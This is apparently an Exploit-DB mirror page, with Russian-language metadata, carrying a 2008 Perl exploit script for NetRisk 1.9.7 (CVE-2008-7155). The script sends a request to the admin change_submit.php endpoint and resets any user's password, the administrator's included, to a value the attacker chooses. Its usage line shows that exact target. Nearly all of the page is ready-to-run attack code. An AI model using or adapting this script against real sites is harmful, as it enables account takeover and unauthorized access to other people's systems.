- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4842
- Проверка EDB
-
- Пройдено
- Автор
- COD3RZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-7155
- Дата публикации
- 2008-01-05
Код:
#!/usr/bin/perl
#=========================================================================================================================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | #
# \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| #
#=========================================================================================================================#
# Author: Cod3rZ #
# Site: http://cod3rz.helloweb.eu #
#=========================================================================================================================#
# Status: Public #
#=========================================================================================================================#
# Board: NetRisk 1.9.7 #
# Download: http://phprisk.org/netrisk_1.9.7.zip #
#=========================================================================================================================#
# Vuln Type: Remote Password Change [Exploit] #
# Severity: Highest #
#=========================================================================================================================#
# The ACP haven't control and we can change the password of the other users #
#=========================================================================================================================#
# http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass] #
#=========================================================================================================================#
# NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those #
#=========================================================================================================================#
use LWP::UserAgent;
use HTTP::Request::Common;
$lwp = new LWP::UserAgent;
system('cls');
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
print q{ ---------------------------------------------------------------------
:: NetRisk 1.9.7 Remote Password Change Exploit ::
---------------------------------------------------------------------
Author : Cod3rZ
Email : [email protected]
Site : http://cod3rz.helloweb.eu
---------------------------------------------------------------------};
if(!$site || !$user || !$pass)
{
print q{
Usage: perl netrisk.pl [site] [user] [newpass]
Usage: perl netrisk.pl site.com/netrisk admin 123456
---------------------------------------------------------------------};
system('exit');
}
else {
print "
Site: $site
User: $user
Pass: $pass
---------------------------------------------------------------------
Waiting...
---------------------------------------------------------------------";
$connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
$content = $connect->content;
if($content =~ /username->/) {
print "
Password Changed
---------------------------------------------------------------------"; }
else { print "
Error
---------------------------------------------------------------------"; }
}
# http://cod3rz.helloweb.eu
# milw0rm.com [2008-01-05]- Источник
- www.exploit-db.com
